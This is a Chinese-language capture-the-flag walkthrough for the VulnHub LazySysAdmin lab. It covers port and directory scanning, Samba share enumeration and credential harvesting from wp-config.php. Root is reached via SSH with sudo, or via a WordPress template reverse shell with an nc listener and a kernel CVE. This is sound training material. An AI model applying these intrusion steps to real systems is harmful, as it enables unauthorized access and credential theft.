渗透测试 | VulnHub – LazySysAdmin
字数 1568 2025-08-18 11:39:30

VulnHub - LazySysAdmin 渗透测试详细指南

1. 环境准备

1.1 下载目标环境

1.2 运行环境

  • VirtualBox 或 VMware Workstation Player

2. 初始信息收集

2.1 IP探测

使用netdiscover扫描同一网段内的主机:

netdiscover -i wlo1

示例输出:

192.168.0.100 08:00:27:da:8a:ac 1 42 PCS Systemtechnik GmbH

2.2 端口扫描

使用masscan快速扫描:

masscan 192.168.0.100 -p 1-10000 --rate=1000

发现开放端口:3306, 6667, 22, 139, 80, 445

使用nmap详细扫描:

nmap -T4 -A -v 192.168.0.100 -p 0-10000

详细扫描结果:

  • 22/tcp: OpenSSH 6.6.1p1 Ubuntu
  • 80/tcp: Apache httpd 2.4.7 (Ubuntu)
  • 139/tcp: Samba smbd 3.X - 4.X
  • 445/tcp: Samba smbd 4.3.11-Ubuntu
  • 3306/tcp: MySQL (未授权)
  • 6667/tcp: InspIRCd

3. Web服务枚举

3.1 目录爆破

使用dirb工具:

./dirb http://192.168.0.100 wordlists/common.txt -o result.txt

3.2 robots.txt发现

访问http://192.168.0.100/robots.txt发现以下目录:

Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/

3.3 Web服务器信息

curl -I 192.168.0.100

输出:

HTTP/1.1 200 OK
Server: Apache/2.4.7 (Ubuntu)

3.4 重要发现

dirb扫描结果中发现:

  • WordPress路径: /wordpress/
  • phpMyAdmin路径: /phpmyadmin/

4. WordPress扫描

使用wpscan扫描WordPress:

wpscan http://192.168.0.100/wordpress

关键发现:

  • WordPress版本: 4.8.5
  • 主题: twentyfifteen v1.8
  • 注册功能开启
  • XML-RPC接口可用
  • 上传目录和includes目录存在目录遍历

5. Samba服务枚举

使用enum4linux工具:

enum4linux 192.168.0.100

关键发现:

  • 共享资源:
    • print$ (访问被拒绝)
    • share$ (可访问)
    • IPC$ (IPC服务)
  • 用户信息:
    • Unix User\togie (Local User)
    • LAZYSYSADMIN\nobody (Local User)

5.1 访问共享资源

Windows下:

net use k: \\192.168.0.100\share$

Linux下:

mount -t cifs -o username='',password='' //192.168.0.100/share$ /mnt

发现重要文件:

  • deets.txt
  • wp-config.php

从wp-config.php中获取MySQL凭据:

define('DB_USER', 'Admin');
define('DB_PASSWORD', 'TogieMYSQL12345^^');

6. 渗透路径

路径一:SSH登录

尝试使用以下凭据登录SSH:

  • 用户名: togie
  • 密码: 12345 (从deets.txt中发现)

成功登录后:

togie@LazySysAdmin:~$ whoami
togie

togie@LazySysAdmin:~$ sudo su
[sudo] password for togie: 12345

root@LazySysAdmin:/home/togie# id
uid=0(root) gid=0(root) groups=0(root)

路径二:WordPress反弹shell

  1. 使用获取的MySQL凭据登录WordPress后台:

    • 用户名: Admin
    • 密码: TogieMYSQL12345^^

  2. 编辑404.php模板,插入PHP反弹shell代码

  3. 访问触发页面:

    http://192.168.0.100/wordpress/?p=2

  4. 本地监听:

    nc -vlp 1234

  5. 获取shell后提升权限:

    python -c 'import pty; pty.spawn("/bin/sh")'

7. 提权方法

7.1 系统信息

uname -r
# 输出: 4.4.0-31-generic

lsb_release -a
# 输出: Ubuntu 14.04.5 LTS

7.2 可能的提权漏洞

  • CVE-2017-1000112 (适用于Linux内核4.4.0-31-generic)
  • 由于目标机没有gcc,需在本地编译exp后上传执行

8. 最终目标

获取root权限后查看证明文件:

cat /root/proof.txt

9. 工具安装

dirb安装方法(Kali已自带):

wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
tar zxvf dirb222.tar.gz
cd dirb222/
apt-get install libcurl4-gnutls-dev
./configure && make

10. 关键总结

  1. 信息收集是关键,特别是端口扫描和目录爆破
  2. 不要忽视看似简单的密码(如12345)
  3. 共享资源可能包含重要信息
  4. WordPress配置文件常包含数据库凭据
  5. 多尝试不同的渗透路径
  6. 提权前先收集系统详细信息

11. 参考链接

  1. VulnHub Walk-through - LazySysAdmin
  2. LazySysAdmin Vulnerable Machine Walk-through
VulnHub - LazySysAdmin 渗透测试详细指南 1. 环境准备 1.1 下载目标环境 下载链接: 主链接: Google Drive 镜像链接: VulnHub Torrent链接: 磁力链接 1.2 运行环境 VirtualBox 或 VMware Workstation Player 2. 初始信息收集 2.1 IP探测 使用netdiscover扫描同一网段内的主机: 示例输出: 2.2 端口扫描 使用masscan快速扫描: 发现开放端口:3306, 6667, 22, 139, 80, 445 使用nmap详细扫描: 详细扫描结果: 22/tcp: OpenSSH 6.6.1p1 Ubuntu 80/tcp: Apache httpd 2.4.7 (Ubuntu) 139/tcp: Samba smbd 3.X - 4.X 445/tcp: Samba smbd 4.3.11-Ubuntu 3306/tcp: MySQL (未授权) 6667/tcp: InspIRCd 3. Web服务枚举 3.1 目录爆破 使用dirb工具: 3.2 robots.txt发现 访问 http://192.168.0.100/robots.txt 发现以下目录: 3.3 Web服务器信息 输出: 3.4 重要发现 dirb扫描结果中发现: WordPress路径: /wordpress/ phpMyAdmin路径: /phpmyadmin/ 4. WordPress扫描 使用wpscan扫描WordPress: 关键发现: WordPress版本: 4.8.5 主题: twentyfifteen v1.8 注册功能开启 XML-RPC接口可用 上传目录和includes目录存在目录遍历 5. Samba服务枚举 使用enum4linux工具: 关键发现: 共享资源: print$ (访问被拒绝) share$ (可访问) IPC$ (IPC服务) 用户信息: Unix User\togie (Local User) LAZYSYSADMIN\nobody (Local User) 5.1 访问共享资源 Windows下: Linux下: 发现重要文件: deets.txt wp-config.php 从wp-config.php中获取MySQL凭据: 6. 渗透路径 路径一:SSH登录 尝试使用以下凭据登录SSH: 用户名: togie 密码: 12345 (从deets.txt中发现) 成功登录后: 路径二:WordPress反弹shell 使用获取的MySQL凭据登录WordPress后台: 用户名: Admin 密码: TogieMYSQL12345^^ 编辑404.php模板,插入PHP反弹shell代码 访问触发页面: 本地监听: 获取shell后提升权限: 7. 提权方法 7.1 系统信息 7.2 可能的提权漏洞 CVE-2017-1000112 (适用于Linux内核4.4.0-31-generic) 由于目标机没有gcc,需在本地编译exp后上传执行 8. 最终目标 获取root权限后查看证明文件: 9. 工具安装 dirb安装方法(Kali已自带): 10. 关键总结 信息收集是关键,特别是端口扫描和目录爆破 不要忽视看似简单的密码(如12345) 共享资源可能包含重要信息 WordPress配置文件常包含数据库凭据 多尝试不同的渗透路径 提权前先收集系统详细信息 11. 参考链接 VulnHub Walk-through - LazySysAdmin LazySysAdmin Vulnerable Machine Walk-through